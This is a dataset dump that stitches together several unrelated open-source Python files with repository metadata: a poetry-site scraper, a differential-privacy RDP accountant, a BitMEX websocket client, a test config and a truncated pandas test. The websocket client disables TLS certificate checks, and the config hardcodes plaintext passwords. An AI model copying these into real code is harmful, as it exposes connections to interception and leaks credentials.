"access_token": authtoken
}
with open(configdir+"/access_token.json", "w") as configfile:
json.dump(accessjson, configfile)
headlessdone = True
except KeyError:
time.sleep(5)
return authtoken
| 35.959184
| 110
| 0.568672
|
8f4b5933201e7fa3723c7fc51b1f9bea5f0fc838
| 4,289
|
py
|
Python
|
ci/UpdateCi.py
|
WOCyo/chinese-poetry
|
88ac4a5104c9435fbf172b9b25f4200654c2a237
|
[
"MIT"
] | 1
|
2022-03-21T14:04:31.000Z
|
2022-03-21T14:04:31.000Z
|
ci/UpdateCi.py
|
WOCyo/chinese-poetry
|
88ac4a5104c9435fbf172b9b25f4200654c2a237
|
[
"MIT"
] | null | null | null |
ci/UpdateCi.py
|
WOCyo/chinese-poetry
|
88ac4a5104c9435fbf172b9b25f4200654c2a237
|
[
"MIT"
] | null | null | null |
import json
import logging
import os
import re
from difflib import SequenceMatcher
import requests
from bs4 import BeautifulSoup
from bs4.element import NavigableString
def get_page_content(page: int) -> list:
""" 获取目录页每一页的内容 """
content = []
r = requests.post("http://qsc.zww.cn/getdata.asp", data={
"seektype": 2,
"seekvalue": "",
"pageno": page
})
r.encoding = "gbk"
soup = BeautifulSoup(re.search(r"filllist\('·(.*?)'\);", r.text).group(1), features="lxml")
for i, a in enumerate(soup.find_all(name="a")):
if i % 2 == 0:
content.append({
"rhythmic": a.string.split("(")[0],
"param": re.search(r"doseek2\((.*?)\);", a["onclick"]).group(1).split(",")
})
else:
content[-1]["author"] = a.string
for c in content:
c["paragraphs"] = get_paragraphs(int(c["param"][0]), int(c["param"][1]))
del c["param"]
return content
def get_paragraphs(seek_type: int, seek_value: int) -> list:
""" 获取词的内容段落 """
paragraphs = []
r = requests.post("http://qsc.zww.cn/getdata.asp", data={
"seektype": seek_type,
"seekvalue": seek_value,
"pageno": 1
})
r.encoding = "gbk"
soup = BeautifulSoup(re.search(r"fillbody\('(.*?)'\);", r.text).group(1), features="lxml")
for child in soup.find(name="p", align=None).contents:
if isinstance(child, NavigableString):
paragraphs.append(child)
return paragraphs
def get_all_page(temp_file: str):
""" 爬取数据并保存至临时文件 """
for page in range(1, 1240):
all_data.extend(get_page_content(page))
logging.info("Success: save page {0}".format(page))
with open(temp_file, "w", encoding="utf-8") as f:
f.write(json.dumps(all_data, indent=2, ensure_ascii=False))
def only_text(text: str):
""" 去除标点只保留文字 """
return re.sub(r"[,。、《》…()·・\s]", "", text)
def update_file_data(old_data: list, new_data: list):
for i in range(len(old_data)):
old_text = only_text("".join(old_data[i]["paragraphs"]))
new_text = only_text("".join(new_data[start + i]["paragraphs"]))
# 计算纯文字的相似度
ratio = SequenceMatcher(a=old_text, b=new_text).quick_ratio()
if 0.9 <= ratio < 1.0:
# 假定此范围内说明缺字,需要更新
old_data[i]["author"] = new_data[start + i]["author"]
old_data[i]["paragraphs"] = new_data[start + i]["paragraphs"]
elif ratio < 0.9:
# 异常情况warning输出,不更新
logging.warning(old_text)
logging.warning(new_text)
else:
old_data[i]["author"] = new_data[start + i]["author"]
char_dict = {
"鵷": "鹓",
"颭": "飐",
"鷁": "鹢",
"鴞": "鸮",
"餖": "饾",
"飣": "饤",
"舃": "舄",
"駸": "骎",
"薄倖": "薄幸",
"赬": "赪",
"鷫鸘": "鹔鹴",
"嶮": "崄",
"後": "后",
"纇": "颣",
"颸": "飔",
"崑崙": "昆仑",
"曨": "昽"
}
def correct(old_data: list):
""" 部分繁体转为简体 """
for i in range(len(old_data)):
for j in range(len(old_data[i]["paragraphs"])):
for k, v in char_dict.items():
if k in old_data[i]["paragraphs"][j]:
old_data[i]["paragraphs"][j] = old_data[i]["paragraphs"][j].replace(k, v)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format="%(asctime)s - %(levelname)-9s %(filename)-15s[:%(lineno)d]\t%(message)s")
temp_file_name = "all.json"
# 临时文件不存在则先爬取
if not os.path.exists(temp_file_name):
get_all_page(temp_file_name)
# 读取临时文件
with open("all.json", "r", encoding="utf-8") as f:
all_data = json.load(f)
# 遍历当前目录
for file_name in os.listdir("./"):
if re.match(r"ci\.song\.\d+\.json", file_name):
# 每个文件开始的数据索引
start = int(file_name.split(".")[2])
with open(file_name, "r", encoding="utf-8") as f:
file_data = json.load(f)
update_file_data(file_data, all_data)
correct(file_data)
# 保存数据,原文件中逗号后有空格,这里保持一致
with open(file_name, "w", encoding="utf-8") as f:
f.write(json.dumps(file_data, indent=2, ensure_ascii=False).replace(",", ", "))
logging.info("Save " + file_name)
| 31.306569
| 105
| 0.547214
|
674fd21e8889269802d5c0a2d62bbc6b4828db29
| 20,608
|
py
|
Python
|
tensorflow_privacy/privacy/analysis/rdp_privacy_accountant.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/analysis/rdp_privacy_accountant.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/analysis/rdp_privacy_accountant.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Privacy accountant that uses Renyi differential privacy."""
import math
from typing import Collection, Optional
import numpy as np
from scipy import special
from tensorflow_privacy.privacy.analysis import dp_event
from tensorflow_privacy.privacy.analysis import privacy_accountant
NeighborRel = privacy_accountant.NeighboringRelation
def _log_add(logx, logy):
"""Adds two numbers in the log space."""
a, b = min(logx, logy), max(logx, logy)
if a == -np.inf: # adding 0
return b
# Use exp(a) + exp(b) = (exp(a - b) + 1) * exp(b)
return math.log1p(math.exp(a - b)) + b # log1p(x) = log(x + 1)
def _log_sub(logx, logy):
"""Subtracts two numbers in the log space. Answer must be non-negative."""
if logx < logy:
raise ValueError('The result of subtraction must be non-negative.')
if logy == -np.inf: # subtracting 0
return logx
if logx == logy:
return -np.inf # 0 is represented as -np.inf in the log space.
try:
# Use exp(x) - exp(y) = (exp(x - y) - 1) * exp(y).
return math.log(math.expm1(logx - logy)) + logy # expm1(x) = exp(x) - 1
except OverflowError:
return logx
def _log_sub_sign(logx, logy):
"""Returns log(exp(logx)-exp(logy)) and its sign."""
if logx > logy:
s = True
mag = logx + np.log(1 - np.exp(logy - logx))
elif logx < logy:
s = False
mag = logy + np.log(1 - np.exp(logx - logy))
else:
s = True
mag = -np.inf
return s, mag
def _log_comb(n, k):
"""Computes log of binomial coefficient."""
return (special.gammaln(n + 1) - special.gammaln(k + 1) -
special.gammaln(n - k + 1))
def _compute_log_a_int(q, sigma, alpha):
"""Computes log(A_alpha) for integer alpha, 0 < q < 1."""
assert isinstance(alpha, int)
# Initialize with 0 in the log space.
log_a = -np.inf
for i in range(alpha + 1):
log_coef_i = (
_log_comb(alpha, i) + i * math.log(q) + (alpha - i) * math.log(1 - q))
s = log_coef_i + (i * i - i) / (2 * (sigma**2))
log_a = _log_add(log_a, s)
return float(log_a)
def _compute_log_a_frac(q, sigma, alpha):
"""Computes log(A_alpha) for fractional alpha, 0 < q < 1."""
# The two parts of A_alpha, integrals over (-inf,z0] and [z0, +inf), are
# initialized to 0 in the log space:
log_a0, log_a1 = -np.inf, -np.inf
i = 0
z0 = sigma**2 * math.log(1 / q - 1) + .5
while True: # do ... until loop
coef = special.binom(alpha, i)
log_coef = math.log(abs(coef))
j = alpha - i
log_t0 = log_coef + i * math.log(q) + j * math.log(1 - q)
log_t1 = log_coef + j * math.log(q) + i * math.log(1 - q)
log_e0 = math.log(.5) + _log_erfc((i - z0) / (math.sqrt(2) * sigma))
log_e1 = math.log(.5) + _log_erfc((z0 - j) / (math.sqrt(2) * sigma))
log_s0 = log_t0 + (i * i - i) / (2 * (sigma**2)) + log_e0
log_s1 = log_t1 + (j * j - j) / (2 * (sigma**2)) + log_e1
if coef > 0:
log_a0 = _log_add(log_a0, log_s0)
log_a1 = _log_add(log_a1, log_s1)
else:
log_a0 = _log_sub(log_a0, log_s0)
log_a1 = _log_sub(log_a1, log_s1)
i += 1
if max(log_s0, log_s1) < -30:
break
return _log_add(log_a0, log_a1)
def _log_erfc(x):
"""Computes log(erfc(x)) with high accuracy for large x."""
try:
return math.log(2) + special.log_ndtr(-x * 2**.5)
except NameError:
# If log_ndtr is not available, approximate as follows:
r = special.erfc(x)
if r == 0.0:
# Using the Laurent series at infinity for the tail of the erfc function:
# erfc(x) ~ exp(-x^2-.5/x^2+.625/x^4)/(x*pi^.5)
# To verify in Mathematica:
# Series[Log[Erfc[x]] + Log[x] + Log[Pi]/2 + x^2, {x, Infinity, 6}]
return (-math.log(math.pi) / 2 - math.log(x) - x**2 - .5 * x**-2 +
.625 * x**-4 - 37. / 24. * x**-6 + 353. / 64. * x**-8)
else:
return math.log(r)
def _compute_delta(orders, rdp, epsilon):
"""Compute delta given a list of RDP values and target epsilon.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
epsilon: The target epsilon.
Returns:
Optimal delta.
Raises:
ValueError: If input is malformed.
"""
if epsilon < 0:
raise ValueError(f'Epsilon cannot be negative. Found {epsilon}.')
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# delta = min( np.exp((rdp - epsilon) * (orders - 1)) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4):
logdeltas = [] # work in log space to avoid overflows
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
# For small alpha, we are better of with bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
# Take a min of the two bounds.
if r == 0:
logdelta = -np.inf
else:
logdelta = 0.5 * math.log1p(-math.exp(-r))
if a > 1.01:
# This bound is not numerically stable as alpha->1.
# Thus we have a min value for alpha.
# The bound is also not useful for small alpha, so doesn't matter.
rdp_bound = (a - 1) * (r - epsilon + math.log1p(-1 / a)) - math.log(a)
logdelta = min(logdelta, rdp_bound)
logdeltas.append(logdelta)
return min(math.exp(np.min(logdeltas)), 1.)
def _compute_epsilon(orders, rdp, delta):
"""Compute epsilon given a list of RDP values and target delta.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
delta: The target delta. Must be >= 0.
Returns:
Optimal epsilon.
Raises:
ValueError: If input is malformed.
"""
if delta < 0:
raise ValueError(f'Delta cannot be negative. Found {delta}.')
if delta == 0:
if all(r == 0 for r in rdp):
return 0
else:
return np.inf
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# epsilon = min( rdp - math.log(delta) / (orders - 1) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4).
# Also appears in https://arxiv.org/abs/2001.05990 Equation 20 (in v1).
eps = []
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
if delta**2 + math.expm1(-r) > 0:
# In this case, we can simply bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
epsilon = 0 # No need to try further computation if we have epsilon = 0.
elif a > 1.01:
# This bound is not numerically stable as alpha->1.
# Thus we have a min value of alpha.
# The bound is also not useful for small alpha, so doesn't matter.
epsilon = r + math.log1p(-1 / a) - math.log(delta * a) / (a - 1)
else:
# In this case we can't do anything. E.g., asking for delta = 0.
epsilon = np.inf
eps.append(epsilon)
return max(0, np.min(eps))
def _stable_inplace_diff_in_log(vec, signs, n=-1):
"""Replaces the first n-1 dims of vec with the log of abs difference operator.
Args:
vec: numpy array of floats with size larger than 'n'
signs: Optional numpy array of bools with the same size as vec in case one
needs to compute partial differences vec and signs jointly describe a
vector of real numbers' sign and abs in log scale.
n: Optonal upper bound on number of differences to compute. If negative, all
differences are computed.
Returns:
The first n-1 dimension of vec and signs will store the log-abs and sign of
the difference.
Raises:
ValueError: If input is malformed.
"""
assert vec.shape == signs.shape
if n < 0:
n = np.max(vec.shape) - 1
else:
assert np.max(vec.shape) >= n + 1
for j in range(0, n, 1):
if signs[j] == signs[j + 1]: # When the signs are the same
# if the signs are both positive, then we can just use the standard one
signs[j], vec[j] = _log_sub_sign(vec[j + 1], vec[j])
# otherwise, we do that but toggle the sign
if not signs[j + 1]:
signs[j] = ~signs[j]
else: # When the signs are different.
vec[j] = _log_add(vec[j], vec[j + 1])
signs[j] = signs[j + 1]
def _get_forward_diffs(fun, n):
"""Computes up to nth order forward difference evaluated at 0.
See Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf
Args:
fun: Function to compute forward differences of.
n: Number of differences to compute.
Returns:
Pair (deltas, signs_deltas) of the log deltas and their signs.
"""
func_vec = np.zeros(n + 3)
signs_func_vec = np.ones(n + 3, dtype=bool)
# ith coordinate of deltas stores log(abs(ith order discrete derivative))
deltas = np.zeros(n + 2)
signs_deltas = np.zeros(n + 2, dtype=bool)
for i in range(1, n + 3, 1):
func_vec[i] = fun(1.0 * (i - 1))
for i in range(0, n + 2, 1):
# Diff in log scale
_stable_inplace_diff_in_log(func_vec, signs_func_vec, n=n + 2 - i)
deltas[i] = func_vec[0]
signs_deltas[i] = signs_func_vec[0]
return deltas, signs_deltas
def _compute_log_a(q, noise_multiplier, alpha):
if float(alpha).is_integer():
return _compute_log_a_int(q, noise_multiplier, int(alpha))
else:
return _compute_log_a_frac(q, noise_multiplier, alpha)
def _compute_rdp_poisson_subsampled_gaussian(q, noise_multiplier, orders):
"""Computes RDP of the Poisson sampled Gaussian mechanism.
Args:
q: The sampling rate.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders. Can be `np.inf`.
"""
def compute_one_order(q, alpha):
if np.isinf(alpha) or noise_multiplier == 0:
return np.inf
if q == 0:
return 0
if q == 1.:
return alpha / (2 * noise_multiplier**2)
return _compute_log_a(q, noise_multiplier, alpha) / (alpha - 1)
return np.array([compute_one_order(q, order) for order in orders])
def _compute_rdp_sample_wor_gaussian(q, noise_multiplier, orders):
"""Computes RDP of Gaussian mechanism using sampling without replacement.
This function applies to the following schemes:
1. Sampling w/o replacement: Sample a uniformly random subset of size m = q*n.
2. ``Replace one data point'' version of differential privacy, i.e., n is
considered public information.
Reference: Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf (A strengthened
version applies subsampled-Gaussian mechanism.)
- Wang, Balle, Kasiviswanathan. "Subsampled Renyi Differential Privacy and
Analytical Moments Accountant." AISTATS'2019.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders, can be np.inf.
"""
return np.array([
_compute_rdp_sample_wor_gaussian_scalar(q, noise_multiplier, order)
for order in orders
])
def _compute_rdp_sample_wor_gaussian_scalar(q, sigma, alpha):
"""Compute RDP of the Sampled Gaussian mechanism at order alpha.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
assert (q <= 1) and (q >= 0) and (alpha >= 1)
if q == 0:
return 0
if q == 1.:
return alpha / (2 * sigma**2)
if np.isinf(alpha):
return np.inf
if float(alpha).is_integer():
return _compute_rdp_sample_wor_gaussian_int(q, sigma, int(alpha)) / (
alpha - 1)
else:
# When alpha not an integer, we apply Corollary 10 of [WBK19] to interpolate
# the CGF and obtain an upper bound
alpha_f = math.floor(alpha)
alpha_c = math.ceil(alpha)
x = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_f)
y = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_c)
t = alpha - alpha_f
return ((1 - t) * x + t * y) / (alpha - 1)
def _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha):
"""Compute log(A_alpha) for integer alpha, subsampling without replacement.
When alpha is smaller than max_alpha, compute the bound Theorem 27 exactly,
otherwise compute the bound with Stirling approximation.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
max_alpha = 256
assert isinstance(alpha, int)
if np.isinf(alpha):
return np.inf
elif alpha == 1:
return 0
def cgf(x):
# Return rdp(x+1)*x, the rdp of Gaussian mechanism is alpha/(2*sigma**2)
return x * 1.0 * (x + 1) / (2.0 * sigma**2)
def func(x):
# Return the rdp of Gaussian mechanism
return 1.0 * x / (2.0 * sigma**2)
# Initialize with 1 in the log space.
log_a = 0
# Calculates the log term when alpha = 2
log_f2m1 = func(2.0) + np.log(1 - np.exp(-func(2.0)))
if alpha <= max_alpha:
# We need forward differences of exp(cgf)
# The following line is the numerically stable way of implementing it.
# The output is in polar form with logarithmic magnitude
deltas, _ = _get_forward_diffs(cgf, alpha)
# Compute the bound exactly requires book keeping of O(alpha**2)
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
elif i > 2:
delta_lo = deltas[int(2 * np.floor(i / 2.0)) - 1]
delta_hi = deltas[int(2 * np.ceil(i / 2.0)) - 1]
s = np.log(4) + 0.5 * (delta_lo + delta_hi)
s = np.minimum(s, np.log(2) + cgf(i - 1))
s += i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return float(log_a)
else:
# Compute the bound with stirling approximation. Everything is O(x) now.
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
else:
s = np.log(2) + cgf(i - 1) + i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return log_a
def _effective_gaussian_noise_multiplier(event: dp_event.DpEvent):
"""Determines the effective noise multiplier of nested structure of Gaussians.
A series of Gaussian queries on the same data can be reexpressed as a single
query with pre- and post- processing. For details, see section 3 of
https://arxiv.org/pdf/1812.06210.pdf.
Args:
event: A `dp_event.DpEvent`. In order for conversion to be successful it
must consist of a single `dp_event.GaussianDpEvent`, or a nested structure
of `dp_event.ComposedDpEvent` and/or `dp_event.SelfComposedDpEvent`
bottoming out in `dp_event.GaussianDpEvent`s.
Returns:
The noise multiplier of the equivalent `dp_event.GaussianDpEvent`, or None
if the input event was not a `dp_event.GaussianDpEvent` or a nested
structure of `dp_event.ComposedDpEvent` and/or
`dp_event.SelfComposedDpEvent` bottoming out in `dp_event.GaussianDpEvent`s.
"""
if isinstance(event, dp_event.GaussianDpEvent):
return event.noise_multiplier
elif isinstance(event, dp_event.ComposedDpEvent):
sum_sigma_inv_sq = 0
for e in event.events:
sigma = _effective_gaussian_noise_multiplier(e)
if sigma is None:
return None
sum_sigma_inv_sq += sigma**-2
return sum_sigma_inv_sq**-0.5
elif isinstance(event, dp_event.SelfComposedDpEvent):
sigma = _effective_gaussian_noise_multiplier(event.event)
return None if sigma is None else (event.count * sigma**-2)**-0.5
else:
return None
class RdpAccountant(privacy_accountant.PrivacyAccountant):
"""Privacy accountant that uses Renyi differential privacy."""
def __init__(
self,
orders: Optional[Collection[float]] = None,
neighboring_relation: NeighborRel = NeighborRel.ADD_OR_REMOVE_ONE,
):
super().__init__(neighboring_relation)
if orders is None:
# Default orders chosen to give good coverage for Gaussian mechanism in
# the privacy regime of interest. In the future, more orders might be
# added, in particular, fractional orders between 1.0 and 10.0 or so.
orders = [
2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 16, 20, 24, 28, 32, 48, 64, 128,
256, 512, 1024
]
self._orders = np.array(orders)
self._rdp = np.zeros_like(orders, dtype=np.float64)
def supports(self, event: dp_event.DpEvent) -> bool:
return self._maybe_compose(event, 0, False)
def _compose(self, event: dp_event.DpEvent, count: int = 1):
self._maybe_compose(event, count, True)
def _maybe_compose(self, event: dp_event.DpEvent, count: int,
do_compose: bool) -> bool:
"""Traverses `event` and performs composition if `do_compose` is True.
If `do_compose` is False, can be used to check whether composition is
supported.
Args:
event: A `DpEvent` to process.
count: The number of times to compose the event.
do_compose: Whether to actually perform the composition.
Returns:
True if event is supported, otherwise False.
"""
if isinstance(event, dp_event.NoOpDpEvent):
return True
elif isinstance(event, dp_event.NonPrivateDpEvent):
if do_compose:
self._rdp += np.inf
return True
elif isinstance(event, dp_event.SelfComposedDpEvent):
return self._maybe_compose(event.event, event.count * count, do_compose)
elif isinstance(event, dp_event.ComposedDpEvent):
return all(
self._maybe_compose(e, count, do_compose) for e in event.events)
elif isinstance(event, dp_event.GaussianDpEvent):
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=1.0, noise_multiplier=event.noise_multiplier, orders=self._orders)
return True
elif isinstance(event, dp_event.PoissonSampledDpEvent):
if self._neighboring_relation is not NeighborRel.ADD_OR_REMOVE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=event.sampling_probability,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
elif isinstance(event, dp_event.SampledWithoutReplacementDpEvent):
if self._neighboring_relation is not NeighborRel.REPLACE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_sample_wor_gaussian(
q=event.sample_size / event.source_dataset_size,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
else:
# Unsupported event (including `UnsupportedDpEvent`).
return False
def get_epsilon(self, target_delta: float) -> float:
return _compute_epsilon(self._orders, self._rdp, target_delta)
def get_delta(self, target_epsilon: float) -> float:
return _compute_delta(self._orders, self._rdp, target_epsilon)
| 33.508943
| 80
| 0.65426
|
966e552590e84aaad282fe310ab44a4b93d8e287
| 4,119
|
py
|
Python
|
bitmex_websocket/_bitmex_websocket.py
|
tmaeda1981jp/bitmex-websocket
|
160d662a7db03834701dc27f6ed908b90ad6b75b
|
[
"MIT"
] | null | null | null |
bitmex_websocket/_bitmex_websocket.py
|
tmaeda1981jp/bitmex-websocket
|
160d662a7db03834701dc27f6ed908b90ad6b75b
|
[
"MIT"
] | null | null | null |
bitmex_websocket/_bitmex_websocket.py
|
tmaeda1981jp/bitmex-websocket
|
160d662a7db03834701dc27f6ed908b90ad6b75b
|
[
"MIT"
] | null | null | null |
from bitmex_websocket.auth.api_key_auth import generate_nonce,\
generate_signature
from bitmex_websocket.settings import settings
from pyee import EventEmitter
from urllib.parse import urlparse
from websocket import WebSocketApp
import alog
import json
import ssl
import time
__all__ = ['BitMEXWebsocket']
class BitMEXWebsocketConnectionError(Exception):
pass
class BitMEXWebsocket(
WebSocketApp,
EventEmitter
):
def __init__(
self,
should_auth=False,
heartbeat=True,
ping_interval=10,
ping_timeout=9,
**kwargs
):
self.ping_timeout = ping_timeout
self.ping_interval = ping_interval
self.should_auth = should_auth
self.heartbeat = heartbeat
self.channels = []
self.reconnect_count = 0
super().__init__(
url=self.gen_url(),
header=self.header(),
on_message=self.on_message,
on_close=self.on_close,
on_open=self.on_open,
on_error=self.on_error,
on_pong=self.on_pong,
**kwargs
)
super(EventEmitter, self).__init__()
self.on('subscribe', self.on_subscribe)
def gen_url(self):
base_url = settings.BASE_URL
url_parts = list(urlparse(base_url))
query_string = ''
if self.heartbeat:
query_string = '?heartbeat=true'
url = "wss://{}/realtime{}".format(url_parts[1], query_string)
return url
def run_forever(self, **kwargs):
"""Connect to the websocket in a thread."""
# setup websocket.run_forever arguments
ws_run_args = {
'sslopt': {"cert_reqs": ssl.CERT_NONE}
}
if self.heartbeat:
ws_run_args['ping_timeout'] = self.ping_timeout
ws_run_args['ping_interval'] = self.ping_interval
alog.debug(ws_run_args)
super().run_forever(**ws_run_args)
def on_pong(self, message):
timestamp = float(time.time() * 1000)
latency = timestamp - (self.last_ping_tm * 1000)
self.emit('latency', latency)
def subscribe(self, channel: str):
subscription_msg = {"op": "subscribe", "args": [channel]}
self._send_message(subscription_msg)
def _send_message(self, message):
self.send(json.dumps(message))
def is_connected(self):
return self.sock.connected
@staticmethod
def on_subscribe(message):
if message['success']:
alog.debug("Subscribed to %s." % message['subscribe'])
else:
raise Exception('Unable to subsribe.')
def on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
if 'error' in message:
self.on_error(message['error'])
action = message['action'] if 'action' in message else None
if action:
self.emit('action', message)
elif 'subscribe' in message:
self.emit('subscribe', message)
elif 'status' in message:
self.emit('status', message)
def header(self):
"""Return auth headers. Will use API Keys if present in settings."""
auth_header = []
if self.should_auth:
alog.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature
# of a nonce and the WS API endpoint.
alog.debug(settings.BITMEX_API_KEY)
nonce = generate_nonce()
api_signature = generate_signature(
settings.BITMEX_API_SECRET, 'GET', '/realtime', nonce, '')
auth_header = [
"api-nonce: " + str(nonce),
"api-signature: " + api_signature,
"api-key:" + settings.BITMEX_API_KEY
]
return auth_header
def on_open(self):
alog.debug("Websocket Opened.")
self.emit('open')
def on_close(self):
alog.info('Websocket Closed')
def on_error(self, error):
raise BitMEXWebsocketConnectionError(error)
| 27.098684
| 76
| 0.599903
|
f3d25a52030648e8f143121ef4e121eab2d1d163
| 1,250
|
py
|
Python
|
backend/config/testing.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | null | null | null |
backend/config/testing.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 368
|
2018-12-18T14:43:20.000Z
|
2022-03-02T02:54:18.000Z
|
backend/config/testing.py
|
sartography/star-drive
|
c0f33378d42913c3e677e07f74eb46d7b2b82a0a
|
[
"MIT"
] | 2
|
2019-10-02T03:06:06.000Z
|
2020-10-05T16:53:48.000Z
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_DATABASE_URI = "postgresql://ed_user:ed_pass@localhost/stardrive_test"
TESTING = True
CORS_ENABLED = True
DEBUG = False
DEVELOPMENT = False
MASTER_URL = "http://localhost:5000"
MASTER_EMAIL = "daniel.h.funk@gmail.com"
MASTER_PASS = "dfunk7"
MIRRORING = False
DELETE_RECORDS = False
ELASTIC_SEARCH = {
"index_prefix": "stardrive_test",
"hosts": ["localhost"],
"port": 9200,
"timeout": 20,
"verify_certs": False,
"use_ssl": False,
"http_auth_user": "",
"http_auth_pass": ""
}
#: Default attribute map for single signon.
# This makes it a little easier to spoof the values that come back from
# Shibboleth. One of the aspects of constructing custom headers is that
# they are automatically converted to META Keys, so we have to refer
# to them as that when pulling them out. This is slightly different from
# the structure that actually comes back from Shibboleth.
SSO_ATTRIBUTE_MAP = {
'HTTP_EPPN': (True, 'eppn'), # dhf8r@virginia.edu
'HTTP_UID': (False, 'uid'), # dhf8r
'HTTP_GIVENNAME': (False, 'givenName'), # Daniel
'HTTP_MAIL': (False, 'email') # dhf8r@Virginia.EDU
}
GOOGLE_MAPS_API_KEY = "TEST_API_KEY_GOES_HERE"
| 30.487805
| 81
| 0.716
|
2f6337e162ad32a70995654d15ce0b560ae0d3d7
| 3,492
|
py
|
Python
|
venv/Lib/site-packages/pandas/tests/indexes/multi/test_missing.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/indexes/multi/test_missing.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pandas/tests/indexes/multi/test_missing.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
import pandas as pd
from pandas import MultiIndex
import pandas._testing as tm
def test_fillna(idx):
# GH 11343
msg = "isna is not defined for MultiIndex"
with pytest.raises(NotImplementedError, match=msg):
idx.fillna(idx[0])
def test_dropna():
# GH 6194
idx = pd.MultiIndex.from_arrays(
[
[1, np.nan, 3, np.nan, 5],
[1, 2, np.nan, np.nan, 5],
["a", "b", "c", np.nan, "e"],
]
)
exp = pd.MultiIndex.from_arrays([[1, 5], [1, 5], ["a", "e"]])
tm.assert_index_equal(idx.dropna(), exp)
tm.assert_index_equal(idx.dropna(how="any"), exp)
exp = pd.MultiIndex.from_arrays(
[[1, np.nan, 3, 5], [1, 2, np.nan, 5], ["a", "b", "c", "e"]]
)
tm.assert_index_equal(idx.dropna(how="all"), exp)
msg = "invalid how option: xxx"
with pytest.raises(ValueError, match=msg):
idx.dropna(how="xxx")
# GH26408
# test if missing values are dropped for multiindex constructed
# from codes and values
idx = MultiIndex(
levels=[[np.nan, None, pd.NaT, "128", 2], [np.nan, None, pd.NaT, "128", 2]],
